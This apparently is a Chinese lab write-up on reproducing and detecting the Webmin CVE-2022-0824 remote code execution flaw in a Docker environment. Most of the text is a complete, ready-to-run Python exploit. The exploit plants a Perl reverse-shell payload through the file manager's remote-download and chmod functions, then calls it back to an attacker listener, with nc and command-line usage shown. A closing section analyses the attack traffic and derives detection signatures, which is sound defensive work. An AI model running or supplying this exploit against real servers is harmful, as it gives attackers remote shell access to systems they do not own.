Webmin 远程代码执行 （CVE-2022-0824）漏洞搭建复现+攻击检测原理（流量分析）详细

目录

漏洞简介

环境搭建

漏洞复现

攻击检测原理

1.流量分析

2.确定攻击数据包检测原理

---

Webmin是功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。Webmin让您能够在远程使用支持HTTPS (SSL 上的 HTTP)协议的 Web 浏览器通过 Web界面管理您的主机。

Webmin是一个功能强大且灵活的基于 Web 的服务器管理控制面板，适用于类Unix系统。Webmin允许用户配置操作系统内部，例如用户、磁盘配额、服务或配置文件，以及修改和控制开源应用程序，例如Apache HTTPServer、PHP或MySQL。

漏洞简介

  在 Webmin v1.984 中，影响文件管理器模块，任何没有文件管理器模块访问权限的经过身份验证的低权限用户都可以与文件管理器功能交互，例如从远程 URL 下载文件和更改文件权限 (chmod)。通过在文件管理器中链接这些功能，可以通过精心制作的 .cgi 文件实现远程代码执行。

编号

 CVE编号:CVE-2022-0824

 CNVD编号:CNVD-2022-17023

 CNNVD编号::CNNVD-202203-076

影响版本

危险等级：高 ( 8.8 HIGH )

Webmin Webmin < Webmin Webmin1.990    //1.990版本之前均受影响

环境搭建

尝试vulfoucs起环境 （后面要进行流量抓取和分析，这里抓流量不好抓），换kali机起docker

 拉取漏洞镜像

docker pull vulfocus/webmin_cve-2022-0824:latest

 启动漏洞环境

docker run -itd -p 10000:10000 -d vulfocus/webmin_cve-2022-0824

访问映射地址127.0.0.1:10000
账户: root 密码: password

漏洞复现

漏洞环境搭建成功后，访问目标端口号可以看到如下页面

target host: http://192.168.137.128:10000   //模拟目标站点
attacker host: 192.168.137.130 //攻击者

监听端口9999，准备获取反弹shell

nc -lvp 9999

将POC文件下载，并且执行利用脚本

​
python3 Desktop/1.py -t http://192.168.137.128:10000 -c root:password -LS 192.168.137.130:9090 -L 192.168.137.130 -P 9999

​

python脚本如下，也可github搜索自行下载

​​​​​​​#!/usr/bin/python3

"""
Coded by: @faisalfs10x
GitHub: https://github.com/faisalfs10x
Reference: https://huntr.dev/bounties/d0049a96-de90-4b1a-9111-94de1044f295/
""" 

import requests
import urllib3
import argparse
import os
import time

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

TGREEN =  '\033[32m'
TRED =  '\033[31m' 
TCYAN =  '\033[36m' 
TSHELL =  '\033[32;1m' 
ENDC = '\033[m'

class Exploit(object):
    def __init__(self, target, username, password, py3http_server, pyhttp_port, upload_path, callback_ip, callback_port, fname):
        self.target = target
        self.username = username
        self.password = password
        self.py3http_server = py3http_server
        self.pyhttp_port = pyhttp_port
        self.upload_path = upload_path
        self.callback_ip = callback_ip
        self.callback_port = callback_port
        self.fname = fname

        #self.proxies = proxies
        self.s = requests.Session()


    def gen_payload(self):
        payload = ('''perl -e 'use Socket;$i="''' + self.callback_ip  + '''";$p=''' + self.callback_port + ''';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};' ''')
        print(TCYAN + f"\n[+] Generating payload to {self.fname} in current directory", ENDC)
        f = open(f"{self.fname}", "w")
        f.write(payload)
        f.close()

    def login(self):
        login_url = self.target + "/session_login.cgi"
        cookies = { "redirect": "1", "testing": "1", "PHPSESSID": "" }

        data = { 'user' : self.username, 'pass' : self.password }
        try:
            r = self.s.post(login_url, data=data, cookies=cookies, verify=False, allow_redirects=True, timeout=10)
            success_message = 'System hostname'
            if success_message in r.text:
                print(TGREEN + "[+] Login Successful", ENDC)
            else:
                print(TRED +"[-] Login Failed", ENDC)
                exit()

        except requests.Timeout as e:
            print(TRED + f"[-] Target: {self.target} is not responding, Connection timed out", ENDC)
            exit()

    def pyhttp_server(self):
        print(f'[+] Attempt to host http.server on {self.pyhttp_port}\n')
        os.system(f'(setsid $(which python3) -m http.server {self.pyhttp_port} 0>&1 & ) ') # add 2>/dev/null for clean up
        print('[+] Sleep 3 second to ensure http server is up!')
        time.sleep(3) # Sleep for 5 seconds to ensure http server is up!

    def download_remote_url(self):
        download_url = self.target + "/extensions/file-manager/http_download.cgi?module=filemin"
        headers = { 
                    "Accept": "application/json, text/javascript, */*; q=0.01", 
                    "Accept-Encoding": "gzip, deflate", 
                    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", 
                    "X-Requested-With": "XMLHttpRequest", 
                    "Referer": self.target + "/filemin/?xnavigation=1" 
        }

        data = { 
                'link': "http://" + self.py3http_server + "/" + self.fname, 
                'username': '', 
                'password': '', 
                'path': self.upload_path 
        }

        r = self.s.post(download_url, data=data, headers=headers, verify=False, allow_redirects=True)
        print(f"\n[+] Fetching {self.fname} from http.server {self.py3http_server}")

    def modify_permission(self):
        modify_perm_url = self.target + "/extensions/file-manager/chmod.cgi?module=filemin&page=1&paginate=30"
        headers = { "Referer": self.target + "/filemin/?xnavigation=1" }
        data = { "name": self.fname, "perms": "0755", "applyto": "1", "path": self.upload_path }
       
        r = self.s.post(modify_perm_url, data=data, headers=headers, verify=False, allow_redirects=True)
        print(f"[+] Modifying permission of {self.fname} to 0755")

    def exec_revshell(self):
        url = self.target + '/' + self.fname
        try:
            r = self.s.get(url, verify=False, allow_redirects=True, timeout=3)
        except requests.Timeout as e: # check target whether make response in 3s, then it indicates shell has been spawned!
            print(TGREEN + f"\n[+] Success: shell spawned to {self.callback_ip} via port {self.callback_port} - XD", ENDC)
            print("[+] Shell location: " + url)
        else:
            print(TRED + f"\n[-] Please setup listener first and try again with: nc -lvp {self.callback_port}", ENDC)

    def do_cleanup(self):
        print(TCYAN + '\n[+] Cleaning up ')
        print(f'[+] Killing: http.server on port {self.pyhttp_port}')
        os.system(f'kill -9 $(lsof -t -i:{self.pyhttp_port})')
        exit()

    def run(self):
        self.gen_payload()
        self.login()
        self.pyhttp_server()
        self.download_remote_url()
        self.modify_permission()
        self.exec_revshell()
        self.do_cleanup()


if __name__ == "__main__":

    parser = argparse.ArgumentParser(description='Webmin CVE-2022-0824 Reverse Shell')
    parser.add_argument('-t', '--target', type=str, required=True, help=' Target full URL, https://www.webmin.local:10000')
    parser.add_argument('-c', '--credential', type=str, required=True, help=' Format, user:user123')
    parser.add_argument('-LS', '--py3http_server', type=str, required=True, help=' Http server for serving payload, ex 192.168.8.120:8080')
    parser.add_argument('-L', '--callback_ip', type=str, required=True, help=' Callback IP to receive revshell')
    parser.add_argument('-P', '--callback_port', type=str, required=True, help=' Callback port to receive revshell')
    parser.add_argument("-V",'--version', action='version', version='%(prog)s 1.0')
    args = parser.parse_args()

    target = args.target
    username = args.credential.split(':')[0]
    password = args.credential.split(':')[1]
    py3http_server = args.py3http_server
    pyhttp_port = py3http_server.split(':')[1]
    callback_ip = args.callback_ip
    callback_port = args.callback_port
    upload_path = "/usr/share/webmin"
    fname = "revshell.cgi"

    pwn = Exploit(target, username, password, py3http_server, pyhttp_port, upload_path, callback_ip, callback_port, fname)
    pwn.run()

运行结果

反弹shell成功

攻击流量截图

攻击检测原理

1.流量分析

这是一个提权漏洞，首先门槛是有一个用户名及密码才能利用成功，利用这个漏洞只能发送POST请求方式去请求session_login.cgi才能利用成功

这里出现持续连接，判断是在进行下载目标payload，就是上传文件，文件里面有回连IP和端口

之后去请求服务器上的cgi文件，目标机器进行了下载

在这个包中发现攻击机下载路径以及下载后目标机文件保存路径

文件保存之后对文件进行了赋权操作

数据包内容：对下载完成文件进行了赋予执行权

反弹shell的包

数据包内容（这里我数据包没有内容，可能丢包了，又重新换机子抓取的流量，数据包内容一样都是这样）

2.确定攻击数据包检测原理

观察POC需要上传一个Payload后进行加权才能回连，确定判断攻击成功条件为上传成功文件并赋权执行

分析此数据包，上传路径 poc中固定路径 /extensions/file-manager/chmod.cgi?；UA这一块出现python-requests字段，对比提取发现为固定出现字段；赋权字段为perms=0755（0755为普通权限用户即可赋权，若改为777，需要root权限执行，所以这里设定为不动）；文件路径字段为path=（由于文件路径不确定，所以暂不匹配具体值）